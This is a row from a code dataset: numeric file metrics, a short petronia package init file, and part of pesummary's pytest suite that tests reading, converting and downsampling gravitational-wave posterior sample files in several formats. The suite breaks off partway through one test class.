| 0
| 0
| 1
| 0.082192
| false
| 0.082192
| 0.027397
| 0
| 0.136986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
03c70810e4599743aefb894171b1cfa6fd1bfcf7
| 47
|
py
|
Python
|
old_stuff/petronia/__init__.py
|
groboclown/petronia
|
486338023d19cee989e92f0c5692680f1a37811f
|
[
"MIT"
] | 19
|
2017-06-21T10:28:24.000Z
|
2021-12-31T11:49:28.000Z
|
old_stuff/petronia/__init__.py
|
groboclown/petronia
|
486338023d19cee989e92f0c5692680f1a37811f
|
[
"MIT"
] | 10
|
2016-11-11T18:57:57.000Z
|
2021-02-01T15:33:43.000Z
|
old_stuff/petronia/__init__.py
|
groboclown/petronia
|
486338023d19cee989e92f0c5692680f1a37811f
|
[
"MIT"
] | 3
|
2017-09-17T03:29:35.000Z
|
2019-06-03T10:43:08.000Z
|
from . import config
from . import exceptions
| 11.75
| 24
| 0.765957
| 6
| 47
| 6
| 0.666667
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.191489
| 47
| 3
| 25
| 15.666667
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff04112471c8b43ccafe09151cd9fd564bcd8807
| 71,899
|
py
|
Python
|
pesummary/tests/read_test.py
|
pesummary/pesummary
|
99e3c450ecbcaf5a23564d329bdf6e0080f6f2a8
|
[
"MIT"
] | 1
|
2021-08-03T05:58:20.000Z
|
2021-08-03T05:58:20.000Z
|
pesummary/tests/read_test.py
|
pesummary/pesummary
|
99e3c450ecbcaf5a23564d329bdf6e0080f6f2a8
|
[
"MIT"
] | 1
|
2020-06-13T13:29:35.000Z
|
2020-06-15T12:45:04.000Z
|
pesummary/tests/read_test.py
|
pesummary/pesummary
|
99e3c450ecbcaf5a23564d329bdf6e0080f6f2a8
|
[
"MIT"
] | 3
|
2021-07-08T08:31:28.000Z
|
2022-03-31T14:08:58.000Z
|
# Licensed under an MIT style license -- see LICENSE.md
import os
import shutil
import numpy as np
from .base import make_result_file, testing_dir
import pesummary
from pesummary.gw.file.read import read as GWRead
from pesummary.core.file.read import read as Read
from pesummary.io import read, write
import glob
__author__ = ["Charlie Hoy <charlie.hoy@ligo.org>"]
class BaseRead(object):
"""Base class to test the core functions in the Read and GWRead functions
"""
def test_parameters(self, true, pesummary=False):
"""Test the parameter property
"""
if pesummary:
assert all(i in self.result.parameters[0] for i in true)
assert all(i in true for i in self.result.parameters[0])
else:
assert all(i in self.result.parameters for i in true)
assert all(i in true for i in self.result.parameters)
def test_samples(self, true, pesummary=False):
"""Test the samples property
"""
if pesummary:
assert len(self.result.samples[0]) == 1000
assert len(self.result.samples[0][0]) == 18
samples = self.result.samples[0]
parameters = self.result.parameters[0]
else:
assert len(self.result.samples) == 1000
assert len(self.result.samples[0]) == 18
samples = self.result.samples
parameters = self.result.parameters
idxs = [self.parameters.index(i) for i in parameters]
np.testing.assert_almost_equal(
np.array(samples), np.array(self.samples)[:, idxs]
)
for ind, param in enumerate(parameters):
samp = np.array(samples).T[ind]
idx = self.parameters.index(param)
np.testing.assert_almost_equal(samp, np.array(self.samples).T[idx])
def test_samples_dict(self, true):
"""Test the samples_dict property
"""
parameters = true[0]
samples = true[1]
for num, param in enumerate(parameters):
specific_samples = [i[num] for i in samples]
drawn_samples = self.result.samples_dict[param]
np.testing.assert_almost_equal(drawn_samples, specific_samples)
def test_version(self, true=None):
"""Test the version property
"""
if true is None:
assert self.result.input_version == "No version information found"
else:
assert self.result.input_version == true
def test_extra_kwargs(self, true=None):
"""Test the extra_kwargs property
"""
if true is None:
assert self.result.extra_kwargs == {
"sampler": {"nsamples": 1000}, "meta_data": {}
}
else:
assert sorted(self.result.extra_kwargs) == sorted(true)
def test_injection_parameters(self, true, pesummary=False):
"""Test the injection_parameters property
"""
if true is None:
assert self.result.injection_parameters is None
else:
import math
assert all(i in list(true.keys()) for i in self.parameters)
assert all(i in self.parameters for i in list(true.keys()))
if not pesummary:
for i in true.keys():
if math.isnan(true[i]):
assert math.isnan(self.result.injection_parameters[i])
else:
assert true[i] == self.result.injection_parameters[i]
def test_to_dat(self):
"""Test the to_dat method
"""
self.result.to_dat(outdir=".outdir", label="label")
assert os.path.isfile(os.path.join(".outdir", "pesummary_label.dat"))
data = np.genfromtxt(
os.path.join(".outdir", "pesummary_label.dat"), names=True)
assert all(i in self.parameters for i in list(data.dtype.names))
assert all(i in list(data.dtype.names) for i in self.parameters)
for param in self.parameters:
assert np.testing.assert_almost_equal(
data[param], self.result.samples_dict[param], 8
) is None
def test_file_format_read(self, path, file_format, _class, function=Read):
"""Test that when the file_format is specified, that correct class is used
"""
result = function(path, file_format=file_format)
assert isinstance(result, _class)
def test_downsample(self):
"""Test the .downsample method. This includes testing that the
.downsample method downsamples to the specified number of samples,
that it only takes samples that are currently in the posterior
table and that it maintains concurrent samples.
"""
old_samples_dict = self.result.samples_dict
nsamples = 50
self.result.downsample(nsamples)
new_samples_dict = self.result.samples_dict
assert new_samples_dict.number_of_samples == nsamples
for param in self.parameters:
assert all(
samp in old_samples_dict[param] for samp in
new_samples_dict[param]
)
for num in range(nsamples):
samp_inds = [
old_samples_dict[param].tolist().index(
new_samples_dict[param][num]
) for param in self.parameters
]
assert len(set(samp_inds)) == 1
class GWBaseRead(BaseRead):
"""Base class to test the GWRead specific functions
"""
def test_parameters(self, true, pesummary=False):
"""Test the parameter property
"""
super(GWBaseRead, self).test_parameters(true, pesummary=pesummary)
from .base import gw_parameters
full_parameters = gw_parameters()
self.result.generate_all_posterior_samples()
assert all(i in self.result.parameters for i in full_parameters)
assert all(i in full_parameters for i in self.result.parameters)
def test_injection_parameters(self, true):
"""Test the injection_parameters property
"""
import math
super(GWBaseRead, self).test_injection_parameters(true)
self.result.add_injection_parameters_from_file(testing_dir + "/main_injection.xml", conversion=False)
true = {
'dec': [1.949725], 'geocent_time': [1186741861], 'spin_2x': [0.],
'spin_2y': [0.], 'spin_2z': [0.], 'luminosity_distance': [139.7643],
'ra': [-1.261573], 'spin_1y': [0.], 'spin_1x': [0.], 'spin_1z': [0.],
'psi': [1.75], 'phase': [0.], 'iota': [1.0471976],
'mass_1': [53.333332], 'mass_2': [26.666668],
'symmetric_mass_ratio': [0.22222222], 'a_1': float('nan'),
'a_2': float('nan'), 'tilt_1': float('nan'), 'tilt_2': float('nan'),
'phi_jl': float('nan'), 'phi_12': float('nan'),
'theta_jn': float('nan'), 'redshift': float('nan'),
'mass_1_source': float('nan'), 'mass_2_source': float('nan'),
'log_likelihood': float('nan')
}
assert all(i in list(true.keys()) for i in self.parameters)
for i in true.keys():
if not isinstance(true[i], list) and math.isnan(true[i]):
assert math.isnan(self.result.injection_parameters[i])
else:
np.testing.assert_almost_equal(
true[i], self.result.injection_parameters[i], 5
)
def test_calibration_data_in_results_file(self):
"""Test the calibration_data_in_results_file property
"""
pass
def test_add_injection_parameters_from_file(self):
"""Test the add_injection_parameters_from_file method
"""
pass
def test_add_fixed_parameters_from_config_file(self):
"""Test the add_fixed_parameters_from_config_file method
"""
pass
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
from pesummary.gw.file.standard_names import lalinference_map
self.result.to_lalinference(dat=True, outdir=".outdir",
filename="lalinference_label.dat")
assert os.path.isfile(os.path.join(".outdir", "lalinference_label.dat"))
data = np.genfromtxt(
os.path.join(".outdir", "lalinference_label.dat"), names=True)
for param in data.dtype.names:
if param not in self.result.parameters:
pesummary_param = lalinference_map[param]
else:
pesummary_param = param
assert np.testing.assert_almost_equal(
data[param], self.result.samples_dict[pesummary_param], 8
) is None
def test_file_format_read(self, path, file_format, _class):
"""Test that when the file_format is specified, that correct class is used
"""
super(GWBaseRead, self).test_file_format_read(
path, file_format, _class, function=GWRead
)
class TestCoreJsonFile(BaseRead):
"""Class to test loading in a JSON file with the core Read function
"""
def setup(self):
"""Setup the TestCoreJsonFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="json", gw=False)
self.path = os.path.join(".outdir", "test.json")
self.result = Read(self.path)
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreJsonFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreJsonFile, self).test_samples(self.samples)
def test_samples_dict(self):
true = [self.parameters, self.samples]
super(TestCoreJsonFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreJsonFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreJsonFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreJsonFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreJsonFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreJsonFile, self).test_file_format_read(
self.path, "json", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreJsonFile, self).test_downsample()
class TestCoreHDF5File(BaseRead):
"""Class to test loading in an HDF5 file with the core Read function
"""
def setup(self):
"""Setup the TestCoreHDF5File class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="hdf5", gw=False)
self.path = os.path.join(".outdir", "test.h5")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreHDF5File, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreHDF5File, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreHDF5File, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreHDF5File, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreHDF5File, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreHDF5File, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreHDF5File, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreHDF5File, self).test_file_format_read(self.path, "hdf5", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreHDF5File, self).test_downsample()
class TestCoreCSVFile(BaseRead):
"""Class to test loading in a csv file with the core Read function
"""
def setup(self):
"""Setup the TestCoreCSVFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="csv", gw=False)
self.path = os.path.join(".outdir", "test.csv")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreCSVFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreCSVFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreCSVFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreCSVFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreCSVFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreCSVFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreCSVFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreCSVFile, self).test_file_format_read(self.path, "csv", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreCSVFile, self).test_downsample()
class TestCoreNumpyFile(BaseRead):
"""Class to test loading in a numpy file with the core Read function
"""
def setup(self):
"""Setup the TestCoreNumpyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="npy", gw=False)
self.path = os.path.join(".outdir", "test.npy")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreNumpyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreNumpyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreNumpyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreNumpyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreNumpyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreNumpyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreNumpyFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreNumpyFile, self).test_file_format_read(self.path, "numpy", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreNumpyFile, self).test_downsample()
class TestCoreDatFile(BaseRead):
"""Class to test loading in an dat file with the core Read function
"""
def setup(self):
"""Setup the TestCoreDatFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="dat", gw=False)
self.path = os.path.join(".outdir", "test.dat")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreDatFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreDatFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreDatFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreDatFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreDatFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreDatFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreDatFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreDatFile, self).test_file_format_read(self.path, "dat", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreDatFile, self).test_downsample()
class BilbyFile(BaseRead):
"""Base class to test loading in a bilby file with the core Read function
"""
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(self.result, pesummary.core.file.formats.bilby.Bilby)
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(BilbyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(BilbyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
true = [self.parameters, self.samples]
super(BilbyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the bilby class
"""
true = "bilby=0.5.3:"
super(BilbyFile, self).test_version(true)
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = {"sampler": {
"log_bayes_factor": 0.5,
"log_noise_evidence": 0.1,
"log_evidence": 0.2,
"log_evidence_err": 0.1},
"meta_data": {'time_marginalization': True},
"other": {"likelihood": {"time_marginalization": "True"}}
}
super(BilbyFile, self).test_extra_kwargs(true)
def test_injection_parameters(self, true):
"""Test the injection_parameters property
"""
super(BilbyFile, self).test_injection_parameters(true)
def test_file_format_read(self, path, file_format):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.bilby import Bilby
super(BilbyFile, self).test_file_format_read(path, file_format, Bilby)
def test_priors(self, read_function=Read):
"""Test that the priors are correctly extracted from the bilby result
file
"""
for param, prior in self.result.priors["samples"].items():
assert isinstance(prior, np.ndarray)
f = read_function(self.path, disable_prior=True)
assert not len(f.priors["samples"])
f = read_function(self.path, nsamples_for_prior=200)
params = list(f.priors["samples"].keys())
assert len(f.priors["samples"][params[0]]) == 200
class TestCoreJsonBilbyFile(BilbyFile):
"""Class to test loading in a bilby json file with the core Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="json", gw=False, bilby=True)
self.path = os.path.join(".outdir", "test.json")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreJsonBilbyFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestCoreJsonBilbyFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestCoreJsonBilbyFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
super(TestCoreJsonBilbyFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreJsonBilbyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreJsonBilbyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: 1. for par in self.parameters}
super(TestCoreJsonBilbyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreJsonBilbyFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
super(TestCoreJsonBilbyFile, self).test_file_format_read(self.path, "bilby")
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreJsonBilbyFile, self).test_downsample()
def test_priors(self):
"""Test that the priors are correctly extracted from the bilby result
file
"""
super(TestCoreJsonBilbyFile, self).test_priors()
class TestCoreHDF5BilbyFile(BilbyFile):
"""Class to test loading in a bilby hdf5 file with the core Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="hdf5", gw=False, bilby=True)
self.path = os.path.join(".outdir", "test.h5")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreHDF5BilbyFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestCoreHDF5BilbyFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestCoreHDF5BilbyFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
super(TestCoreHDF5BilbyFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreHDF5BilbyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreHDF5BilbyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: 1. for par in self.parameters}
super(TestCoreHDF5BilbyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreHDF5BilbyFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
super(TestCoreHDF5BilbyFile, self).test_file_format_read(self.path, "bilby")
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreHDF5BilbyFile, self).test_downsample()
def test_priors(self):
"""Test that the priors are correctly extracted from the bilby result
file
"""
super(TestCoreHDF5BilbyFile, self).test_priors(read_function=Read)
class PESummaryFile(BaseRead):
"""Base class to test loading in a PESummary file with the core Read function
"""
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(self.result, pesummary.core.file.formats.pesummary.PESummary)
def test_parameters(self):
"""Test the parameter property of the PESummary class
"""
super(PESummaryFile, self).test_parameters(
self.parameters, pesummary=True)
def test_samples(self):
"""Test the samples property of the PESummary class
"""
super(PESummaryFile, self).test_samples(
self.samples, pesummary=True)
def test_version(self):
"""Test the version property of the default class
"""
true = ["No version information found"]
super(PESummaryFile, self).test_version(true)
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = [{"sampler": {"log_evidence": 0.5}, "meta_data": {}}]
super(PESummaryFile, self).test_extra_kwargs(true)
def test_samples_dict(self):
"""Test the samples_dict property
"""
assert list(self.result.samples_dict.keys()) == ["label"]
parameters = self.parameters
samples = self.samples
for num, param in enumerate(parameters):
specific_samples = [i[num] for i in samples]
drawn_samples = self.result.samples_dict["label"][param]
np.testing.assert_almost_equal(drawn_samples, specific_samples)
def test_to_bilby(self):
"""Test the to_bilby method
"""
from pesummary.core.file.read import is_bilby_json_file
bilby_object = self.result.to_bilby(save=False)["label"]
bilby_object.save_to_file(
filename=os.path.join(".outdir", "bilby.json"))
assert is_bilby_json_file(os.path.join(".outdir", "bilby.json"))
def test_to_dat(self):
"""Test the to_dat method
"""
self.result.to_dat(
outdir=".outdir", filenames={"label": "pesummary_label.dat"}
)
assert os.path.isfile(os.path.join(".outdir", "pesummary_label.dat"))
data = np.genfromtxt(
os.path.join(".outdir", "pesummary_label.dat"), names=True)
assert all(i in self.parameters for i in list(data.dtype.names))
assert all(i in list(data.dtype.names) for i in self.parameters)
def test_downsample(self):
"""Test the .downsample method
"""
old_samples_dict = self.result.samples_dict
nsamples = 50
self.result.downsample(nsamples)
for num, label in enumerate(self.result.labels):
assert self.result.samples_dict[label].number_of_samples == nsamples
for param in self.parameters[num]:
assert all(
samp in old_samples_dict[label][param] for samp in
self.result.samples_dict[label][param]
)
for idx in range(nsamples):
samp_inds = [
old_samples_dict[label][param].tolist().index(
self.result.samples_dict[label][param][idx]
) for param in self.parameters[num]
]
assert len(set(samp_inds)) == 1
class TestCoreJsonPESummaryFile(PESummaryFile):
"""Class to test loading in a PESummary json file with the core Read
function
"""
def setup(self):
"""Setup the TestCorePESummaryFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="json", gw=False, pesummary=True)
self.result = Read(os.path.join(".outdir", "test.json"))
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreJsonPESummaryFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the PESummary class
"""
super(TestCoreJsonPESummaryFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the PESummary class
"""
super(TestCoreJsonPESummaryFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property
"""
super(TestCoreJsonPESummaryFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreJsonPESummaryFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreJsonPESummaryFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreJsonPESummaryFile, self).test_injection_parameters(
true, pesummary=True)
def test_to_bilby(self):
"""Test the to_bilby method
"""
super(TestCoreJsonPESummaryFile, self).test_to_bilby()
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreJsonPESummaryFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
pass
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreJsonPESummaryFile, self).test_downsample()
class TestCoreHDF5PESummaryFile(PESummaryFile):
"""Class to test loading in a PESummary hdf5 file with the core Read
function
"""
def setup(self):
"""Setup the TestCorePESummaryFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="hdf5", gw=False, pesummary=True)
self.result = Read(os.path.join(".outdir", "test.h5"))
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreHDF5PESummaryFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the PESummary class
"""
super(TestCoreHDF5PESummaryFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the PESummary class
"""
super(TestCoreHDF5PESummaryFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property
"""
super(TestCoreHDF5PESummaryFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreHDF5PESummaryFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreHDF5PESummaryFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreHDF5PESummaryFile, self).test_injection_parameters(
true, pesummary=True)
def test_to_bilby(self):
"""Test the to_bilby method
"""
super(TestCoreHDF5PESummaryFile, self).test_to_bilby()
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreHDF5PESummaryFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
pass
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreHDF5PESummaryFile, self).test_downsample()
class TestGWCSVFile(GWBaseRead):
"""Class to test loading in a csv file with the core Read function
"""
def setup(self):
"""Setup the TestGWCSVFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="csv", gw=True)
self.path = os.path.join(".outdir", "test.csv")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWCSVFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWCSVFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWCSVFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWCSVFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWCSVFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWCSVFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWCSVFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWCSVFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWCSVFile, self).test_file_format_read(
self.path, "csv", SingleAnalysisDefault
)
class TestGWNumpyFile(GWBaseRead):
"""Class to test loading in a npy file with the core Read function
"""
def setup(self):
"""Setup the TestGWNumpyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
